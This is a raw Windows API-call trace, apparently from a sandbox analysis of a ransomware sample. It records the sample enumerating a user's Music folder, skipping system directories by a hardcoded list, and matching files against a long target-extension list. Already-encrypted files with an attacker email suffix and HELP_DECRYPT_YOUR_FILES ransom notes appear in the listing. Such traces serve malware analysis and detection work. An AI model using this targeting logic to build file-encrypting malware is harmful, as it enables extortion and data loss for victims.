	[0192.802] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0192.803] CloseHandle (hObject=0x384) returned 1
	[0192.803] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8849dad0, ftCreationTime.dwHighDateTime=0x1d9741f, ftLastAccessTime.dwLowDateTime=0x8c6ee4b5, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c714853, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0192.803] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\*.*") returned 48
	[0192.803] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0192.803] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\*.*", cchLength=0x30 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*") returned 0x30
	[0192.803] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.804] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="windows") returned 0x0
	[0192.804] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.804] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="boot") returned 0x0
	[0192.804] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.804] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="system volume information") returned 0x0
	[0192.804] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.804] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0192.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.805] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="temp") returned 0x0
	[0192.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.805] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="program files") returned 0x0
	[0192.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.805] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="program files (x86)") returned 0x0
	[0192.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.806] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="appdata") returned 0x0
	[0192.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.806] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="application data") returned 0x0
	[0192.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.806] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="winnt") returned 0x0
	[0192.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.806] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="tmp") returned 0x0
	[0192.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.807] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="cache") returned 0x0
	[0192.807] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.807] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="temporary internet files") returned 0x0
	[0192.807] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.807] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="webcache") returned 0x0
	[0192.807] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.807] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="inetcache") returned 0x0
	[0192.807] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.808] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="nvidia") returned 0x0
	[0192.808] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.808] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="packages") returned 0x0
	[0192.808] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.808] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="cookies") returned 0x0
	[0192.808] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.809] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="programdata") returned 0x0
	[0192.809] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0192.809] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0192.809] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8849dad0, ftCreationTime.dwHighDateTime=0x1d9741f, ftLastAccessTime.dwLowDateTime=0x8c6ee4b5, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c714853, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0192.809] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0192.809] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3a7283, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8c3a7283, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c3cd341, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x16780, dwReserved0=0x0, dwReserved1=0x0, cFileName="3hnghp4u.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="3HNGHP~1.SCL")) returned 1
	[0192.809] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c419a0a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8c419a0a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c465cf9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x15600, dwReserved0=0x0, dwReserved1=0x0, cFileName="6zwj25wazy74j0wdnf.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="6ZWJ25~1.SCL")) returned 1
	[0192.809] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c714853, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8c714853, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c73ab48, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0192.809] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c714853, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8c714853, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c714853, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0192.809] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4886550, ftCreationTime.dwHighDateTime=0x1d9677c, ftLastAccessTime.dwLowDateTime=0x56ce1660, ftLastAccessTime.dwHighDateTime=0x1d96f6f, ftLastWriteTime.dwLowDateTime=0x56ce1660, ftLastWriteTime.dwHighDateTime=0x1d96f6f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZigkEMouwXCNeznLl", cAlternateFileName="IZIGKE~1")) returned 1
	[0192.810] lstrcmpW (lpString1="IZigkEMouwXCNeznLl", lpString2="..") returned 1
	[0192.810] lstrcmpW (lpString1="IZigkEMouwXCNeznLl", lpString2=".") returned 1
	[0192.810] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv"
	[0192.810] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\"
	[0192.810] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\", lpString2="IZigkEMouwXCNeznLl" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl"
	[0192.810] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl"
	[0192.810] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\"
	[0192.810] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\"
	[0192.811] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\*.*"
	[0192.811] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4886550, ftCreationTime.dwHighDateTime=0x1d9677c, ftLastAccessTime.dwLowDateTime=0x56ce1660, ftLastAccessTime.dwHighDateTime=0x1d96f6f, ftLastWriteTime.dwLowDateTime=0x56ce1660, ftLastWriteTime.dwHighDateTime=0x1d96f6f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0192.811] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\*.*") returned 67
	[0192.811] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0192.811] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\*.*", cchLength=0x43 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*") returned 0x43
	[0192.811] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.812] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="windows") returned 0x0
	[0192.812] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.812] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="boot") returned 0x0
	[0192.812] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.812] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="system volume information") returned 0x0
	[0192.812] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.812] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0192.812] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.813] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="temp") returned 0x0
	[0192.813] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.813] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="program files") returned 0x0
	[0192.813] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.813] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="program files (x86)") returned 0x0
	[0192.813] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.813] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="appdata") returned 0x0
	[0192.813] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.814] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="application data") returned 0x0
	[0192.814] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.814] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="winnt") returned 0x0
	[0192.814] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.814] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="tmp") returned 0x0
	[0192.814] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.814] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="cache") returned 0x0
	[0192.815] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.873] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="temporary internet files") returned 0x0
	[0192.873] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.873] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="webcache") returned 0x0
	[0192.873] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.873] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="inetcache") returned 0x0
	[0192.873] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.874] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="nvidia") returned 0x0
	[0192.874] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.874] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="packages") returned 0x0
	[0192.874] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.874] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="cookies") returned 0x0
	[0192.874] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.874] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="programdata") returned 0x0
	[0192.874] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4886550, ftCreationTime.dwHighDateTime=0x1d9677c, ftLastAccessTime.dwLowDateTime=0x56ce1660, ftLastAccessTime.dwHighDateTime=0x1d96f6f, ftLastWriteTime.dwLowDateTime=0x56ce1660, ftLastWriteTime.dwHighDateTime=0x1d96f6f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0192.875] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6627a70, ftCreationTime.dwHighDateTime=0x1d968a5, ftLastAccessTime.dwLowDateTime=0xa5858930, ftLastAccessTime.dwHighDateTime=0x1d96bf2, ftLastWriteTime.dwLowDateTime=0xa5858930, ftLastWriteTime.dwHighDateTime=0x1d96bf2, nFileSizeHigh=0x0, nFileSizeLow=0x17f12, dwReserved0=0x0, dwReserved1=0x0, cFileName="4p5dpvFNh8I1IM.mp3", cAlternateFileName="4P5DPV~1.MP3")) returned 1
	[0192.875] lstrcmpW (lpString1="4p5dpvFNh8I1IM.mp3", lpString2="..") returned 1
	[0192.875] lstrcmpW (lpString1="4p5dpvFNh8I1IM.mp3", lpString2=".") returned 1
	[0192.875] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\"
	[0192.875] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\", lpString2="4p5dpvFNh8I1IM.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\4p5dpvFNh8I1IM.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\4p5dpvFNh8I1IM.mp3"
	[0192.876] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\4p5dpvFNh8I1IM.mp3") returned 82
	[0192.876] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0192.876] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\4p5dpvFNh8I1IM.mp3", cchLength=0x52 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\4p5dpvfnh8i1im.mp3") returned 0x52
	[0192.876] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.876] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\4p5dpvfnh8i1im.mp3", lpSrch="help_decrypt_your_files") returned 0x0
	[0192.876] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\4p5dpvfnh8i1im.mp3" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\4p5dpvfnh8i1im.mp3") returned="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\4p5dpvfnh8i1im.mp3"
	[0192.876] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\4p5dpvfnh8i1im.mp3") returned 82
	[0192.877] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.877] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.877] StrStrW (lpFirst=".mp3", lpSrch=".") returned=".mp3"
	[0192.878] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.878] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay